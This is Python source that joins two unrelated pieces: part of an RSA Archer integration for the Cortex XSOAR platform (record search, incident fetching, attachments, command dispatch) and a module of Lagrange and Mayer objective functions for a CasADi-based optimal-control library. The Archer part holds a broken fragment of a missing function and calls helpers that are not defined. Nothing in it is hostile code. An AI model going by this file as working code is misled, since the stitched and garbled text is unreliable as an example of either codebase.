    def record_to_incident(self, record_item, app_id, date_field, day_first: bool = False,
                           offset: int = 0) -> Tuple[dict, datetime]:
        labels = []
        raw_record = record_item['raw']
        record_item = record_item['record']
        incident_created_time = datetime(1, 1, 1)
        if record_item.get(date_field):
            incident_created_time = parse_date_to_datetime(
                record_item[date_field], day_first=day_first
            ).replace(tzinfo=None)
            # fix occurred by offset
            incident_created_time = incident_created_time + timedelta(minutes=offset)

        # Convert the values to strings
        for k, v in record_item.items():
            if isinstance(v, str):
                labels.append({'type': k, 'value': v})
            else:
                labels.append({'type': k, 'value': json.dumps(v)})

        labels.append({'type': 'ModuleId', 'value': app_id})
        labels.append({'type': 'ContentId', 'value': record_item.get("Id")})
        labels.append({'type': 'rawJSON', 'value': json.dumps(raw_record)})
        incident = {
            'name': f'RSA Archer Incident: {record_item.get("Id")}',
            'details': json.dumps(record_item),
            'occurred': incident_created_time.strftime(OCCURRED_FORMAT),
            'labels': labels,
            'rawJSON': json.dumps(raw_record)
        }
        demisto.debug(f'Going out with a new incident. occurred={incident["occurred"]}')
        return incident, incident_created_time

    def search_records(self, app_id, fields_to_display=None, field_to_search='', search_value='',
                       numeric_operator='', date_operator='', max_results=10):
        demisto.debug(f'searching for records {field_to_search}:{search_value}')
        if fields_to_display is None:
            fields_to_display = []

        try:
            level_data = self.get_level_by_app_id(app_id)[0]
        except IndexError as exc:
            raise DemistoException(
                'Could not find a level data. You might be using the wrong application id'
            ) from exc

        # Building request fields
        fields_xml = ''
        search_field_name = ''
        search_field_id = ''
        fields_mapping = level_data['mapping']
        for field in fields_mapping.keys():
            field_name = fields_mapping[field]['Name']
            if field_name in fields_to_display:
                fields_xml += f'<DisplayField name="{field_name}">{field}</DisplayField>'
            if field_name == field_to_search:
                search_field_name = field_name
                search_field_id = field

        res, raw_res = self.do_soap_request(
            'archer-search-records',
            app_id=app_id, display_fields=fields_xml, field_id=search_field_id, field_name=search_field_name,
            numeric_operator=numeric_operator, date_operator=date_operator,
            search_value=search_value, max_results=max_results
        )
        if not res:
            return [], raw_res

        records = self.xml_to_records(res, fields_mapping)
        return records, raw_res

    def xml_to_records(self, xml_response, fields_mapping):
        res = json.loads(xml2json(xml_response))
        records = []
        if res.get('Records') and res['Records'].get('Record'):
            records_data = res['Records']['Record']
            if isinstance(records_data, dict):
                records_data = [records_data]

            for item in records_data:
                record = {'Id': item.get('@contentId')}
                record_fields = item.get('Field')
                if isinstance(record_fields, dict):
                    record_fields = [record_fields]

                for field in record_fields:
                    field_name = fields_mapping[field.get('@id')]['Name']
                    field_type = field.get('@type')
                    field_value = ''
                    if field_type == '3':
                        field_value = field.get('@xmlConvertedValue')
                    elif field_type == '4':
                        if field.get('ListValues'):
                            field_value = field['ListValues']['ListValue']['@displayName']
                    elif field_type == '8':
                        field_value = json.dumps(field)
                    else:
                        field_value = field.get('#text')

                    record[field_name] = field_value
                records.append({'record': record, 'raw': item})
        return records

    def get_field_value_list(self, field_id):
        cache = demisto.getIntegrationContext()
        # guard against a missing/reset 'fieldValueList' key instead of indexing it directly
        if cache.get('fieldValueList', {}).get(field_id):
            return cache['fieldValueList'][field_id]

        res = self.do_request('GET', f'/api/core/system/fielddefinition/{field_id}')

        errors = get_errors_from_res(res)
        if errors:
            return_error(errors)

        if res.get('RequestedObject') and res.get('IsSuccessful'):
            list_id = res['RequestedObject']['RelatedValuesListId']
            values_list_res = self.do_request('GET', f'/api/core/system/valueslistvalue/valueslist/{list_id}')
            if values_list_res.get('RequestedObject') and values_list_res.get('IsSuccessful'):
                values_list = []
                for value in values_list_res['RequestedObject'].get('Children'):
                    values_list.append({'Id': value['Data']['Id'],
                                        'Name': value['Data']['Name'],
                                        'IsSelectable': value['Data']['IsSelectable']})
                field_data = {'FieldId': field_id, 'ValuesList': values_list}
                cache.setdefault('fieldValueList', {})[field_id] = field_data  # create the key on first use
                demisto.setIntegrationContext(cache)
                return field_data
        return {}


def extract_from_xml(xml, path):
    xml = json.loads(xml2json(xml))
    path = path.split('.')

    for item in path:
        if xml.get(item):
            xml = xml[item]
            continue
        return ''
    return xml
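# --- Illustrative example, not part of the integration: extract_from_xml above
# converts the XML to a dict via xml2json and walks a dotted path through it,
# returning '' as soon as a path element is missing. For instance:
#
#     envelope = '<Envelope><Body><Result>42</Result></Body></Envelope>'
#     extract_from_xml(envelope, 'Envelope.Body.Result')   # -> '42'
#     extract_from_xml(envelope, 'Envelope.Body.Missing')  # -> ''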
'IpAddressBytes', field_val else: return 'Value', field_val def get_errors_from_res(res): if isinstance(res, dict) and res.get('ValidationMessages'): messages = [] for message in res.get('ValidationMessages'): # type: ignore messages.append(message.get('ResourcedMessage')) return '\n'.join(messages) def get_file(entry_id): get_file_path_res = demisto.getFilePath(entry_id) file_path = get_file_path_res["path"] file_name = get_file_path_res["name"] with open(file_path, 'rb') as fopen: file_bytes = fopen.read() file_bytes = base64.b64encode(file_bytes) return file_name, file_bytes.decode('utf-8') def test_module(client: Client, params: dict) -> str: if params.get('isFetch', False): offset_in_minutes = int(params['time_zone']) last_fetch = get_fetch_time( {}, params.get('fetch_time', '3 days'), offset_in_minutes ) fetch_incidents(client, params, last_fetch) return 'ok' return 'ok' if client.do_request('GET', '/api/core/system/application') else 'Connection failed.' def search_applications_command(client: Client, args: Dict[str, str]): app_id = args.get('applicationId') limit = args.get('limit') endpoint_url = '/api/core/system/application/' if app_id: endpoint_url = f'/api/core/system/application/{app_id}' res = client.do_request('GET', endpoint_url) elif limit: res = client.do_request('GET', endpoint_url, params={"$top": limit}) errors = get_errors_from_res(res) if errors: return_error(errors) if isinstance(res, dict): res = [res] applications = [] for app in res: if app.get('RequestedObject') and app.get('IsSuccessful'): app_obj = app['RequestedObject'] applications.append({'Id': app_obj.get('Id'), 'Type': app_obj.get('Type'), 'Name': app_obj.get('Name'), 'LanguageId': app_obj.get('LanguageId'), 'Status': app_obj.get('Status'), 'Guid': app_obj.get('Guid')}) markdown = tableToMarkdown('Search applications results', applications) context: dict = { 'Archer.Application(val.Id && val.Id == obj.Id)': applications} return_outputs(markdown, context, res) def get_application_fields_command(client: Client, args: Dict[str, str]): app_id = args.get('applicationId') res = client.do_request('GET', f'/api/core/system/fielddefinition/application/{app_id}') fields = [] for field in res: if field.get('RequestedObject') and field.get('IsSuccessful'): field_obj = field['RequestedObject'] field_type = field_obj.get('Type') fields.append({'FieldId': field_obj.get('Id'), 'FieldType': FIELD_TYPE_DICT.get(field_type, 'Unknown'), 'FieldName': field_obj.get('Name'), 'LevelID': field_obj.get('LevelId')}) else: errors = get_errors_from_res(field) if errors: return_error(errors) markdown = tableToMarkdown('Application fields', fields) context: dict = {'Archer.ApplicationField(val.FieldId && val.FieldId == obj.FieldId)': fields} return_outputs(markdown, context, res) def get_field_command(client: Client, args: Dict[str, str]): field_id = args.get('fieldID') res = client.do_request('GET', f'/api/core/system/fielddefinition/{field_id}') errors = get_errors_from_res(res) if errors: return_error(errors) field = {} if res.get('RequestedObject') and res.get('IsSuccessful'): field_obj = res['RequestedObject'] item_type = field_obj.get('Type') item_type = FIELD_TYPE_DICT.get(item_type, 'Unknown') field = {'FieldId': field_obj.get('Id'), 'FieldType': item_type, 'FieldName': field_obj.get('Name'), 'LevelID': field_obj.get('LevelId')} markdown = tableToMarkdown('Application field', field) context: dict = { 'Archer.ApplicationField(val.FieldId && val.FieldId == obj.FieldId)': field } return_outputs(markdown, context, res) def 
get_mapping_by_level_command(client: Client, args: Dict[str, str]): level = args.get('level') res = client.do_request('GET', f'/api/core/system/fielddefinition/level/{level}') items = [] for item in res: if item.get('RequestedObject') and item.get('IsSuccessful'): item_obj = item['RequestedObject'] item_type = item_obj.get('Type') if item_type: item_type = FIELD_TYPE_DICT.get(item_type, 'Unknown') else: item_type = 'Unknown' items.append({'Id': item_obj.get('Id'), 'Name': item_obj.get('Name'), 'Type': item_type, 'LevelId': item_obj.get('LevelId')}) else: errors = get_errors_from_res(item) if errors: return_error(errors) markdown = tableToMarkdown(f'Level mapping for level {level}', items) context: dict = {'Archer.LevelMapping(val.Id && val.Id == obj.Id)': items} return_outputs(markdown, context, res) def get_record_command(client: Client, args: Dict[str, str]): record_id = args.get('contentId') app_id = args.get('applicationId') record, res, errors = client.get_record(app_id, record_id) if errors: return_error(errors) markdown = tableToMarkdown('Record details', record) context: dict = { 'Archer.Record(val.Id && val.Id == obj.Id)': record } return_outputs(markdown, context, res) def create_record_command(client: Client, args: Dict[str, str]): app_id = args.get('applicationId') fields_values = args.get('fieldsToValues') try: level_data = client.get_level_by_app_id(app_id)[0] except IndexError as exc: raise DemistoException( 'Got no level by app id. You might be using the wrong application id' ) from exc field_contents = generate_field_contents(client, fields_values, level_data['mapping']) body = {'Content': {'LevelId': level_data['level'], 'FieldContents': field_contents}} res = client.do_request('Post', '/api/core/content', data=body) errors = get_errors_from_res(res) if errors: return_error(errors) if res.get('RequestedObject') and res.get('IsSuccessful'): rec_id = res['RequestedObject']['Id'] return_outputs(f'Record created successfully, record id: {rec_id}', {'Archer.Record.Id': rec_id}, res) def delete_record_command(client: Client, args: Dict[str, str]): record_id = args.get('contentId') res = client.do_request('Delete', f'/api/core/content/{record_id}') errors = get_errors_from_res(res) if errors: return_error(errors) return_outputs(f'Record {record_id} deleted successfully', {}, res) def update_record_command(client: Client, args: Dict[str, str]): app_id = args.get('applicationId') record_id = args.get('contentId') fields_values = args.get('fieldsToValues') level_data = client.get_level_by_app_id(app_id)[0] field_contents = generate_field_contents(client, fields_values, level_data['mapping']) body = {'Content': {'Id': record_id, 'LevelId': level_data['level'], 'FieldContents': field_contents}} res = client.do_request('Put', '/api/core/content', data=body) errors = get_errors_from_res(res) if errors: return_error(errors) if res.get('IsSuccessful'): return_outputs(f'Record {record_id} updated successfully', {}, res) else: raise DemistoException('Update record failed') def execute_statistics_command(client: Client, args: Dict[str, str]): report_guid = args.get('reportGuid') max_results = args.get('maxResults') res, raw_res = client.do_soap_request('archer-execute-statistic-search-by-report', report_guid=report_guid, max_results=max_results) if res: res = json.loads(xml2json(res)) return_outputs(res, {}, {}) def get_reports_command(client: Client, args: Dict[str, str]): res, raw_res = client.do_soap_request('archer-get-reports') res = json.loads(xml2json(res)) ec = 
def search_options_command(client: Client, args: Dict[str, str]):
    report_guid = args.get('reportGuid')
    res, raw_res = client.do_soap_request('archer-get-search-options-by-guid', report_guid=report_guid)
    if res.startswith('<'):
        res = json.loads(xml2json(res))
    return_outputs(res, {}, {})


def reset_cache_command(client: Client, args: Dict[str, str]):
    demisto.setIntegrationContext({})
    return_outputs('', {}, '')


def get_value_list_command(client: Client, args: Dict[str, str]):
    field_id = args.get('fieldID')
    field_data = client.get_field_value_list(field_id)
    markdown = tableToMarkdown(f'Value list for field {field_id}', field_data['ValuesList'])

    context: dict = {
        'Archer.ApplicationField(val.FieldId && val.FieldId == obj.FieldId)': field_data
    }
    return_outputs(markdown, context, {})


def upload_file_command(client: Client, args: Dict[str, str]) -> str:
    """Upload a file to Archer as an attachment.

    Arguments:
        client: A client to use in order to send the API call
        args: demisto args

    Returns:
        An attachment id from Archer
    """
    entry_id = args.get('entryId')
    file_name, file_bytes = get_file(entry_id)
    body = {'AttachmentName': file_name, 'AttachmentBytes': file_bytes}
    res = client.do_request('POST', '/api/core/content/attachment', data=body)

    errors = get_errors_from_res(res)
    if errors:
        return_error(errors)

    if res.get('RequestedObject') and res.get('IsSuccessful'):
        attachment_id = res['RequestedObject'].get('Id')
    else:
        raise DemistoException('Upload file failed')

    return_outputs(f'File uploaded successfully, attachment ID: {attachment_id}', {}, res)
    return attachment_id


def upload_and_associate_command(client: Client, args: Dict[str, str]):
    """Upload an entry to Archer. Then, if needed, associate it to a record."""
    app_id = args.get('applicationId')
    content_id = args.get('contentId')
    associate_field = args.get('associatedField')

    should_associate_to_record = app_id and content_id
    if not should_associate_to_record:  # Not both applicationId and contentId were supplied
        if app_id or content_id:  # Only one of them was supplied - a user's mistake, raise an error
            raise DemistoException(
                'Found arguments to associate an attachment to a record, but not all required arguments supplied'
            )

    attachment_id = upload_file_command(client, args)
    if should_associate_to_record:
        args['fieldsToValues'] = json.dumps({associate_field: [attachment_id]})
        update_record_command(client, args)
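
# --- Illustrative sketch (not part of the integration) ----------------------
# archer-search-records builds a text Contains filter by default; passing
# `dateOperator` (as fetch-incidents does with GreaterThan) or
# `numeric-operator` switches the SOAP condition type. The id, field names and
# timestamp below are hypothetical.
def _example_search_records_args() -> Dict[str, str]:
    """Return example `args` for archer-search-records (illustrative only)."""
    return {
        'applicationId': '75',  # hypothetical application id
        'fieldToSearchOn': 'Date Created',  # hypothetical date field
        'searchValue': '1/1/2020 12:00 AM',  # American format, see format_time
        'dateOperator': 'GreaterThan',  # builds a DateComparisonFilterCondition
        'fieldsToGet': 'Id,Title',
        'fieldsToDisplay': 'Title',
        'fullData': 'false',
    }
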
def search_records_by_report_command(client: Client, args: Dict[str, str]):
    report_guid = args.get('reportGuid')
    res, raw_res = client.do_soap_request('archer-search-records-by-report', report_guid=report_guid)
    if not res:
        return_outputs(f'No records found for report {report_guid}', {}, json.loads(xml2json(raw_res)))
        return

    raw_records = json.loads(xml2json(res))
    records = []
    ec = {}
    if raw_records.get('Records') and raw_records['Records'].get('Record'):
        level_id = raw_records['Records']['Record'][0]['@levelId']
        level_res = client.do_request('GET', f'/api/core/system/fielddefinition/level/{level_id}')
        fields = {}
        for field in level_res:
            if field.get('RequestedObject') and field.get('IsSuccessful'):
                field_item = field.get('RequestedObject')
                field_id = str(field_item.get('Id'))
                fields[field_id] = {'Type': field_item.get('Type'), 'Name': field_item.get('Name')}
        records = client.xml_to_records(res, fields)
        records = list(map(lambda x: x['record'], records))
        ec = {'Record': records, 'RecordsAmount': len(records), 'ReportGUID': report_guid}

    markdown = tableToMarkdown('Search records by report results', records)
    context: dict = {'Archer.SearchByReport(val.ReportGUID && val.ReportGUID == obj.ReportGUID)': ec}
    return_outputs(markdown, context, json.loads(xml2json(raw_res)))


def print_cache_command(client: Client, args: Dict[str, str]):
    cache = demisto.getIntegrationContext()
    return_outputs(cache, {}, {})


def fetch_incidents(client: Client, params: dict, from_time: str) -> Tuple[list, str]:
    """Fetch incidents from Archer.

    Args:
        client: Client derived from BaseClient
        params: demisto.params dict.
        from_time: Time to start the fetch from

    Returns:
        The incidents and the next fetch time (a string in OCCURRED_FORMAT)
    """
    # Not using the get method, as those params are a must
    app_id = params['applicationId']
    date_field = params['applicationDateField']
    max_results = params.get('fetch_limit', 10)
    offset = int(params.get('time_zone', '0'))
    fields_to_display = argToList(params.get('fields_to_fetch'))
    fields_to_display.append(date_field)
    day_first = argToBoolean(params.get('useEuropeanTime', False))
    from_time_utc_obj = parser(from_time).replace(tzinfo=timezone.utc)
    from_time_utc = format_time(from_time_utc_obj, day_first)

    # API call
    records, raw_res = client.search_records(
        app_id, fields_to_display, date_field, from_time_utc,
        date_operator='GreaterThan', max_results=max_results
    )

    # Build incidents
    incidents = []
    # record_to_incident returns naive datetimes, so drop tzinfo before comparing
    next_fetch = from_time_utc_obj.replace(tzinfo=None)
    for record in records:
        incident, incident_created_time = client.record_to_incident(
            record, app_id, date_field, day_first=day_first, offset=offset
        )
        if incident_created_time > next_fetch:
            next_fetch = incident_created_time
        incidents.append(incident)
    return incidents, next_fetch.strftime(OCCURRED_FORMAT)
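
# --- Illustrative sketch (not part of the integration) ----------------------
# How a fetch cycle persists its window, mirroring the fetch-incidents branch
# of main() below. Assumes a configured `client`; illustrative only.
def _example_fetch_round_trip(client: Client) -> None:
    last_run = demisto.getLastRun()  # e.g. {} on the very first run
    from_time = get_fetch_time(last_run, '3 days')
    incidents, next_fetch = fetch_incidents(client, demisto.params(), from_time)
    demisto.setLastRun({'last_fetch': next_fetch})  # the next run starts from here
    demisto.incidents(incidents)
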
def get_fetch_time(last_fetch: dict, first_fetch_time: str, offset: int = 0) -> str:
    """Gets the lastRun object and the first fetch time (e.g. '3 days') and returns the
    time to start the fetch from: the last run if one exists, else the first fetch time.

    Args:
        last_fetch: a dict that may contain 'last_fetch'
        first_fetch_time: time back in simple format ('3 days')
        offset: time difference between the Cortex XSOAR machine and Archer, in minutes.

    Returns:
        Time to start the fetch from (a string in OCCURRED_FORMAT)
    """
    if next_run := last_fetch.get('last_fetch'):
        start_fetch = parser(next_run)
    else:
        start_fetch, _ = parse_date_range(first_fetch_time)
    if offset:
        start_fetch = start_fetch - timedelta(minutes=offset)
    start_fetch = start_fetch.replace(tzinfo=None)
    return start_fetch.strftime(OCCURRED_FORMAT)


def main():
    params = demisto.params()
    credentials = params.get('credentials')
    base_url = params.get('url').strip('/')

    cache = demisto.getIntegrationContext()
    if not cache.get('fieldValueList'):
        cache['fieldValueList'] = {}
        demisto.setIntegrationContext(cache)

    client = Client(
        base_url,
        credentials.get('identifier'), credentials.get('password'),
        params.get('instanceName'),
        params.get('userDomain'),
        verify=not params.get('insecure', False),
        proxy=params.get('proxy', False)
    )
    commands = {
        'archer-search-applications': search_applications_command,
        'archer-get-application-fields': get_application_fields_command,
        'archer-get-field': get_field_command,
        'archer-get-mapping-by-level': get_mapping_by_level_command,
        'archer-get-record': get_record_command,
        'archer-create-record': create_record_command,
        'archer-delete-record': delete_record_command,
        'archer-update-record': update_record_command,
        'archer-execute-statistic-search-by-report': execute_statistics_command,
        'archer-get-reports': get_reports_command,
        'archer-get-search-options-by-guid': search_options_command,
        'archer-reset-cache': reset_cache_command,
        'archer-get-valuelist': get_value_list_command,
        'archer-upload-file': upload_and_associate_command,
        'archer-get-file': download_file_command,
        'archer-list-users': list_users_command,
        'archer-search-records': search_records_command,
        'archer-search-records-by-report': search_records_by_report_command,
        'archer-print-cache': print_cache_command,
    }

    command = demisto.command()
    LOG(f'Command being called is {command}')
    try:
        if command == 'fetch-incidents':
            offset = int(params.get('time_zone', '0'))
            from_time = get_fetch_time(
                demisto.getLastRun(), params.get('fetch_time', '3 days'), offset
            )
            incidents, next_fetch = fetch_incidents(
                client=client, params=params, from_time=from_time
            )
            demisto.debug(f'Setting next run to {next_fetch}')
            demisto.setLastRun({'last_fetch': next_fetch})
            demisto.incidents(incidents)
        elif command == 'test-module':
            demisto.results(test_module(client, params))
        elif command in commands:
            return commands[command](client, demisto.args())
        else:
            return_error('Command not found.')
    except Exception as e:
        return_error(f'Unexpected error: {str(e)}, traceback: {traceback.format_exc()}')


if __name__ in ('__builtin__', 'builtins'):
    main()
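
# --- Illustrative sketch (not part of the integration) ----------------------
# Numeric check of the `offset` handling in get_fetch_time: the window start
# is pushed back by `offset` minutes. The timestamp below is made up.
def _example_offset_semantics() -> str:
    window_start = get_fetch_time({'last_fetch': '2020-06-01T12:00:00Z'}, '3 days', offset=120)
    return window_start  # should evaluate to '2020-06-01T10:00:00Z' - two hours earlier
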
from enum import Enum

import numpy as np
import casadi
from casadi import dot, sum1

from .penalty import PenaltyType, PenaltyFunctionAbstract
from ..misc.enums import Instant
from ..misc.options_lists import OptionList, OptionGeneric


class ObjectiveOption(OptionGeneric):
    def __init__(
        self, objective, instant=Instant.DEFAULT, quadratic=None, weight=1, custom_type=None, phase=0, **params
    ):
        custom_function = None
        if not isinstance(objective, Objective.Lagrange) and not isinstance(objective, Objective.Mayer):
            custom_function = objective

            if custom_type is None:
                raise RuntimeError(
                    "Custom objective function detected, but custom_type is missing. "
                    "It should either be Objective.Mayer or Objective.Lagrange"
                )
            objective = custom_type(custom_type.CUSTOM)
            if isinstance(objective, Objective.Lagrange):
                pass
            elif isinstance(objective, Objective.Mayer):
                pass
            elif isinstance(objective, Objective.Parameter):
                pass
            else:
                raise RuntimeError(
                    "Custom objective function detected, but custom_type is invalid. "
                    "It should either be Objective.Mayer or Objective.Lagrange"
                )

        super(ObjectiveOption, self).__init__(type=objective, phase=phase, **params)
        self.instant = instant
        self.quadratic = quadratic
        self.weight = weight
        self.custom_function = custom_function


class ObjectiveList(OptionList):
    def add(self, objective, **extra_arguments):
        if isinstance(objective, ObjectiveOption):
            self.copy(objective)
        else:
            super(ObjectiveList, self)._add(objective=objective, option_type=ObjectiveOption, **extra_arguments)
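
# --- Illustrative sketch (not part of the library) ---------------------------
# Typical use of the containers above: declare objectives by enum type and let
# ObjectiveList build the ObjectiveOption. The weights below are made up.
def _example_objective_list() -> "ObjectiveList":
    """Build a small ObjectiveList (illustrative only)."""
    objective_functions = ObjectiveList()
    objective_functions.add(Objective.Lagrange.MINIMIZE_TORQUE, weight=100)
    objective_functions.add(Objective.Mayer.MINIMIZE_TIME, weight=1)
    return objective_functions
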
class ObjectiveFunction:
    """
    Objective function management (Lagrange, Mayer and Parameter types).
    """

    class LagrangeFunction(PenaltyFunctionAbstract):
        """
        Lagrange type objectives. (integral of the objective over the optimized movement duration)
        """

        class Functions:
            """
            Biomechanical objectives
            """

            @staticmethod
            def minimize_time(penalty, ocp, nlp, t, x, u, p, **extra_param):
                """Minimizes the duration of the movement (Lagrange)."""
                val = 1
                ObjectiveFunction.LagrangeFunction.add_to_penalty(ocp, nlp, val, penalty, **extra_param)

        @staticmethod
        def add_to_penalty(ocp, nlp, val, penalty, target=None, **extra_arguments):
            """
            Adds an objective.
            :param val: Value to be optimized. (MX.sym from CasADi)
            :param penalty: Index of the objective. (integer)
            :param weight: Weight of the objective. (float)
            :param quadratic: If True, value is squared. (bool)
            """
            ObjectiveFunction.add_to_penalty(ocp, nlp, val, penalty, dt=nlp["dt"], target=target)

        @staticmethod
        def clear_penalty(ocp, nlp, penalty):
            """
            Resets specified penalty.
            """
            return ObjectiveFunction.clear_penalty(ocp, nlp, penalty)

        @staticmethod
        def _parameter_modifier(penalty_function, parameters):
            """Modification of parameters"""
            # Everything that should change the entry parameters depending on the penalty can be added here
            if penalty_function == Objective.Lagrange.MINIMIZE_TIME.value[0]:
                if not parameters.quadratic:
                    parameters.quadratic = True
            PenaltyFunctionAbstract._parameter_modifier(penalty_function, parameters)

        @staticmethod
        def _span_checker(penalty_function, instant, nlp):
            """Raises errors on the span of penalty functions"""
            # Everything that is suspicious in terms of the span of the penalty function can be checked here
            PenaltyFunctionAbstract._span_checker(penalty_function, instant, nlp)

    class MayerFunction(PenaltyFunctionAbstract):
        """
        Mayer type objectives. (value of the objective at one time point, usually the end)
        """

        class Functions:
            """
            Biomechanical objectives
            """

            @staticmethod
            def minimize_time(penalty, ocp, nlp, t, x, u, p, **extra_param):
                """Minimizes the duration of the movement (Mayer)."""
                val = nlp["tf"]
                ObjectiveFunction.MayerFunction.add_to_penalty(ocp, nlp, val, penalty, **extra_param)

        @staticmethod
        def inter_phase_continuity(ocp, pt):
            # Dynamics must be respected between phases
            penalty = OptionGeneric()
            penalty.idx = -1
            penalty.quadratic = pt.quadratic
            penalty.weight = pt.weight
            pt.base.clear_penalty(ocp, None, penalty)
            val = pt.type.value[0](ocp, pt)
            pt.base.add_to_penalty(ocp, None, val, penalty, **pt.params)

        @staticmethod
        def add_to_penalty(ocp, nlp, val, penalty, target=None, **extra_param):
            """
            Adds an objective.
            :param val: Value to be optimized. (MX.sym from CasADi)
            :param penalty: Index of the objective. (integer)
            :param weight: Weight of the objective. (float)
            :param quadratic: If True, value is squared (bool)
            """
            ObjectiveFunction.add_to_penalty(ocp, nlp, val, penalty, dt=1, target=target, **extra_param)

            # # TODO: This next block is at the wrong place
            # if nlp:
            #     if quadratic:
            #         # TODO : This seems simply wrong
            #         J_acados_mayer = casadi.dot(nlp["X"][0], nlp["X"][0]) * weight
            #     else:
            #         # TODO : So this is
            #         J_acados_mayer = casadi.sum1(nlp["X"][0]) * weight
            #     nlp["J_acados_mayer"].append(J_acados_mayer)  # TODO: Find a better name (J_mayer_from_node_0?)
            # else:
            #     pass

        @staticmethod
        def clear_penalty(ocp, nlp, penalty_idx):
            """
            Resets specified penalty.
            """
            return ObjectiveFunction.clear_penalty(ocp, nlp, penalty_idx)

        @staticmethod
        def _parameter_modifier(penalty_function, parameters):
            """Modification of parameters"""
            # Everything that should change the entry parameters depending on the penalty can be added here
            PenaltyFunctionAbstract._parameter_modifier(penalty_function, parameters)

        @staticmethod
        def _span_checker(penalty_function, instant, nlp):
            """Raises errors on the span of penalty functions"""
            # Everything that is suspicious in terms of the span of the penalty function can be checked here
            PenaltyFunctionAbstract._span_checker(penalty_function, instant, nlp)
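
    # --- Illustrative note (not part of the library) --------------------------
    # Lagrange and Mayer objectives differ only in the dt they forward to
    # ObjectiveFunction.add_to_penalty: Lagrange passes dt=nlp["dt"], so the
    # running cost approximates an integral (sum of weight * dt * value over
    # the nodes), while Mayer passes dt=1, so the cost counts once at its
    # instant. With made-up numbers ns=30 and tf=3 s, a Lagrange MINIMIZE_TIME
    # (val=1 per node) sums to about 30 * (3 / 30) = 3, matching the Mayer
    # MINIMIZE_TIME value nlp["tf"] = 3.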
""" return ObjectiveFunction.clear_penalty(ocp, None, penalty_idx) @staticmethod def _parameter_modifier(penalty_function, parameters): """Modification of parameters""" # Everything that should change the entry parameters depending on the penalty can be added here PenaltyFunctionAbstract._parameter_modifier(penalty_function, parameters) @staticmethod def _span_checker(penalty_function, instant, nlp): """Raises errors on the span of penalty functions""" # Everything that is suspicious in terms of the span of the penalty function ca be checked here PenaltyFunctionAbstract._span_checker(penalty_function, instant, nlp) @staticmethod def add_or_replace(ocp, nlp, objective): """ Modifies or raises errors if user provided Instant does not match the objective type. :param objective: New objective to replace with. (dictionary) """ if objective.type.get_type() == ObjectiveFunction.LagrangeFunction: if objective.instant != Instant.ALL and objective.instant != Instant.DEFAULT: raise RuntimeError("Lagrange objective are for Instant.ALL, did you mean Mayer?") objective.instant = Instant.ALL elif objective.type.get_type() == ObjectiveFunction.MayerFunction: if objective.instant == Instant.DEFAULT: objective.instant = Instant.END else: raise RuntimeError("Objective function Type must be either a Lagrange or Mayer type") PenaltyFunctionAbstract.add_or_replace(ocp, nlp, objective) @staticmethod def cyclic(ocp, weight=1): if ocp.nlp[0]["nx"] != ocp.nlp[-1]["nx"]: raise RuntimeError("Cyclic constraint without same nx is not supported yet") ocp.J += ( casadi.dot(ocp.nlp[-1]["X"][-1] - ocp.nlp[0]["X"][0], ocp.nlp[-1]["X"][-1] - ocp.nlp[0]["X"][0]) * weight ) @staticmethod def add_to_penalty(ocp, nlp, val, penalty, dt=0, target=None): """ Adds objective J to objective array nlp["J"][penalty] or ocp.J[penalty] at index penalty. :param J: Objective. (dict of [val, target, weight, is_quadratic]) :param penalty: Index of the objective. (integer) """ val = val target = target if target is not None else None J = {"objective": penalty, "val": val, "target": target, "dt": dt} if nlp: nlp["J"][penalty.idx].append(J) else: ocp.J[penalty.idx].append(J) @staticmethod def clear_penalty(ocp, nlp, penalty): """ Resets specified objective. Negative penalty index leads to enlargement of the array by one empty space. """ if nlp: J_to_add_to = nlp["J"] else: J_to_add_to = ocp.J if penalty.idx < 0: # Add a new one for i, j in enumerate(J_to_add_to): if not j: penalty.idx = i return else: J_to_add_to.append([]) penalty.idx = len(J_to_add_to) - 1 else: while penalty.idx >= len(J_to_add_to): J_to_add_to.append([]) J_to_add_to[penalty.idx] = [] class Objective: class Lagrange(Enum): """ Different conditions between biorbd geometric structures. 
""" MINIMIZE_TIME = (ObjectiveFunction.LagrangeFunction.Functions.minimize_time,) MINIMIZE_STATE = (PenaltyType.MINIMIZE_STATE,) TRACK_STATE = (PenaltyType.TRACK_STATE,) MINIMIZE_MARKERS = (PenaltyType.MINIMIZE_MARKERS,) TRACK_MARKERS = (PenaltyType.TRACK_MARKERS,) MINIMIZE_MARKERS_DISPLACEMENT = (PenaltyType.MINIMIZE_MARKERS_DISPLACEMENT,) MINIMIZE_MARKERS_VELOCITY = (PenaltyType.MINIMIZE_MARKERS_VELOCITY,) TRACK_MARKERS_VELOCITY = (PenaltyType.TRACK_MARKERS_VELOCITY,) ALIGN_MARKERS = (PenaltyType.ALIGN_MARKERS,) PROPORTIONAL_STATE = (PenaltyType.PROPORTIONAL_STATE,) PROPORTIONAL_CONTROL = (PenaltyType.PROPORTIONAL_CONTROL,) MINIMIZE_TORQUE = (PenaltyType.MINIMIZE_TORQUE,) TRACK_TORQUE = (PenaltyType.TRACK_TORQUE,) MINIMIZE_TORQUE_DERIVATIVE = (PenaltyType.MINIMIZE_TORQUE_DERIVATIVE,) MINIMIZE_MUSCLES_CONTROL = (PenaltyType.MINIMIZE_MUSCLES_CONTROL,) TRACK_MUSCLES_CONTROL = (PenaltyType.TRACK_MUSCLES_CONTROL,) MINIMIZE_ALL_CONTROLS = (PenaltyType.MINIMIZE_ALL_CONTROLS,) TRACK_ALL_CONTROLS = (PenaltyType.TRACK_ALL_CONTROLS,) MINIMIZE_CONTACT_FORCES = (PenaltyType.MINIMIZE_CONTACT_FORCES,) TRACK_CONTACT_FORCES = (PenaltyType.TRACK_CONTACT_FORCES,) ALIGN_SEGMENT_WITH_CUSTOM_RT = (PenaltyType.ALIGN_SEGMENT_WITH_CUSTOM_RT,) ALIGN_MARKER_WITH_SEGMENT_AXIS = (PenaltyType.ALIGN_MARKER_WITH_SEGMENT_AXIS,) CUSTOM = (PenaltyType.CUSTOM,) @staticmethod def get_type(): """Returns the type of the objective function""" return ObjectiveFunction.LagrangeFunction class Mayer(Enum): """ Different conditions between biorbd geometric structures. """ MINIMIZE_TIME = (ObjectiveFunction.MayerFunction.Functions.minimize_time,) MINIMIZE_STATE = (PenaltyType.MINIMIZE_STATE,) TRACK_STATE = (PenaltyType.TRACK_STATE,) MINIMIZE_MARKERS = (PenaltyType.MINIMIZE_MARKERS,) TRACK_MARKERS = (PenaltyType.TRACK_MARKERS,) MINIMIZE_MARKERS_DISPLACEMENT = (PenaltyType.MINIMIZE_MARKERS_DISPLACEMENT,) MINIMIZE_MARKERS_VELOCITY = (PenaltyType.MINIMIZE_MARKERS_VELOCITY,) TRACK_MARKERS_VELOCITY = 